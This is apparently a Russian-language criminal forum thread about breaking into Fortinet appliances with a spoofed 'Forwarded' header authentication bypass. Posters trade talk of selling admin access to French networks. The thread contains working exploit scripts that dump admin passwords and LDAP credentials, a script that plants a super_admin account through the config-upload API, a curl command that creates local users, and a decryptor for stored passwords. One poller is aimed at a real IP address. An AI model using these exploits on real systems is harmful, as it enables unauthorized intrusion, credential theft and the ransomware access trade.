ребзя а доступ в фортиаунтификатор это типо по этой теме ? есть админ доступ с логов ... франция сеток на борту 15 +
есть 500 кк ренька у одной
есть 500 кк ренька у одной
если у тебя уже доступ есть, то уязвимость и не нужна )ребзя а доступ в фортиаунтификатор это типо по этой теме ? есть админ доступ с логов ... франция сеток на борту 15 +
есть 500 кк ренька у одной
import ssl
from urllib.request import urlopen, Request
from time import sleep
def fetch(url, method):
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
headers = {
'User-Agent': 'Report Runner',
'Forwarded': 'for="[127.0.0.1]:8080";by="[127.0.0.1]:8081";',
}
return urlopen(
Request(url, headers=headers),
context=context
)
if __name__ == '__main__':
url = 'https://188.95.133.37/api/v2/cmdb/user/local/'
while True:
try:
resp = fetch(url, method='GET')
print(resp.status)
except Exception as err:
print(err)
sleep(1)
continue
200
200
HTTP Error 401: Unauthorized
HTTP Error 401: Unauthorized
HTTP Error 401: Unauthorized
HTTP Error 401: Unauthorized
200
200
200
curl --insecure -XPOST -H 'User-Agent: Report Runner' -H 'Forwarded: for="[127.0.0.1]:8080";by="[127.0.0.1]:8081";' -H 'Content-type: application/json' -H "Content-type: application/json" -d '{'name': 'username', 'passwd': 'password', 'type': 'password'}' 'https://127.0.0.1/api/v2/cmdb/user/local/'
Т.е. после первого эксплойта, сразу подключаться по ssh? Как-то страннозабей. потом пропиши ssh юзернейм@ip и все
#!/usr/bin/env python3
import sys
import re
import base64
from Cryptodome.Cipher import AES
magic = b'Mary had a littl'
encoding="unicode_escape"
filename="result.txt"
reswrite=open(filename,"a")
if len(sys.argv) < 2:
decodeit = input("Please enter your password: ")
else:
decodeit = sys.argv[1]
print ("\nEntered value:","\n"+decodeit)
reswrite.write("Entered value:\n"+decodeit)
basedecode = base64.b64decode(decodeit)
start = basedecode[0:4] + b'\x00' * 12
end = basedecode[4:]
cipher = AES.new(magic, iv=start, mode=AES.MODE_CBC)
muxedpass = cipher.decrypt(end)
decoded = muxedpass.decode(encoding)
reswrite.write("\nJust decrypted password:\n")
reswrite=open(filename,"ab")
reswrite.write(muxedpass)
reswrite=open(filename,"a")
print("\nJust decrypted password:\n"+decoded)
password=re.search(r'^.*?(?=\x00)', decoded).group()
print("\nCleaned password:\n"+password+"\n--------------------------------\n")
reswrite.write("\nCleaned password:\n"+password+"\n--------------------------------\n\n")
Подтверждаю. По све 2018 года до сих пор сетки можно тащить. Правда ревень мелкий в основномp.s зато 2 хоста к уязвимости 2018 года
А ты чекал на уязвимость? Админы или юзеры выводятся?Давненько не смотрел эту багу, тут взял 5 хостов при заливке ключа и конекте с пасом ssh пишет Permission denied, please try again.
Патч?
Да выводятся. Яж раньше через ключи заходил, мож, что с ключиками не то хотя раза 3 их пересоздавал и безтолку.А ты чекал на уязвимость? Админы или юзеры выводятся?
Если они уязвимы, скинь мне эти хосты, я добавлю твоего админа без ссш и ебли с ключами
у тебя скрипт какой под это дело есть или ручками?А ты чекал на уязвимость? Админы или юзеры выводятся?
Если они уязвимы, скинь мне эти хосты, я добавлю твоего админа без ссш и ебли с ключами
у тебя скрипт какой под это дело есть или ручками?
А зачем ты пас на них генерируешь, может в этом проблема?чёто ничего не понимаю, ключи генерю и на убунте и на винде, при заливе и конекте пасс не подходит, чё за лажа мож кто сталкивался? скинте ключики в пм кому не сложно и пас на них.
#!/usr/bin/env python3
import requests
import sys
import urllib3
import json
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(target):
if target[-1] == "/":
target = target[:-1]
print("Exploiting target: {}".format(target))
headers = {
"user-agent": "Node.js",
"accept-encoding": "gzip, deflate",
"Host": "127.0.0.1:9980",
"forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
"x-forwarded-vdom": "root",
}
r = requests.get(target + "/api/v2/cmdb/system/admin", headers=headers, verify=False)
if(r.status_code == 200):
print("\033[92m[+] The target {} is vulnerable\033[0m".format(target))
data = json.loads(r.text)
for user in data['results']:
print("\033[93m[+]\033[0m Admin username: {}".format(user['name']))
print("\033[93m[+]\033[0m Admin password: {}".format(user['password']))
print("\033[93m[+]\033[0m Level access: {}".format(user['accprofile']))
print("[+] Serial: {}".format(data['serial']))
print("[+] Version: {}".format(data['version']))
r = requests.get(target + "/api/v2/cmdb/user/ldap", headers=headers, verify=False)
data = json.loads(r.text)
if(len(data['results']) > 0):
print("[+] Leaking ldap config")
print("\033[93m[+]\033[0m LDAP server: {}".format(data['results'][0]['name']))
print("\033[93m[+]\033[0m LDAP server: {}".format(data['results'][0]['server']))
print("\033[93m[+]\033[0m LDAP binddn: {}".format(data['results'][0]['dn']))
print("\033[93m[+]\033[0m LDAP username: {}".format(data['results'][0]['username']))
print("\033[93m[+]\033[0m LDAP password: {}".format(data['results'][0]['password']))
else:
print("[-] The target is not vulnerable")
def main():
if len(sys.argv) != 2:
print("Usage: exploit.py <target>")
print("Example: exploit.py https://target:8443")
sys.exit(1)
target = sys.argv[1]
exploit(target)
if __name__ == "__main__":
main()
хз раньше генерил пасс ставил 12345 и конектился норм.А зачем ты пас на них генерируешь, может в этом проблема?
бывает начинает пароль запрашивать, когда не открыт ссш на нужном интерфейсечёто ничего не понимаю, ключи генерю и на убунте и на винде, при заливе и конекте пасс не подходит, чё за лажа мож кто сталкивался? скинте ключики в пм кому не сложно и пас на них.
дак я даже без паса генерирую такая же беда. хз чё такое. с двух систем пробовал и винь и линь.бывает начинает пароль запрашивать, когда не открыт ссш на нужном интерфейсе
import requests
from base64 import b64encode
HOST = 'https://127.0.0.1'
headers = {
'Forwarded': 'for="[127.0.0.1]:8080";by="[127.0.0.1]:8081";',
'User-Agent': 'Report Runner',
}
script =
"""
config system admin
edit "FenebutLockbitEbut"
set accprofile "super_admin"
set vdom "root"
set password P@$$w0rd
end
"""
post_data = {"file_content": b64encode(script.encode()).decode(),"filename":"pohui.txt"}
resp = requests.post(HOST + '/api/v2/monitor/system/config-script/upload',
json=post_data,
headers=headers,
verify=False,
)
print(resp.json().get('status'))
script = 'config global\n' + script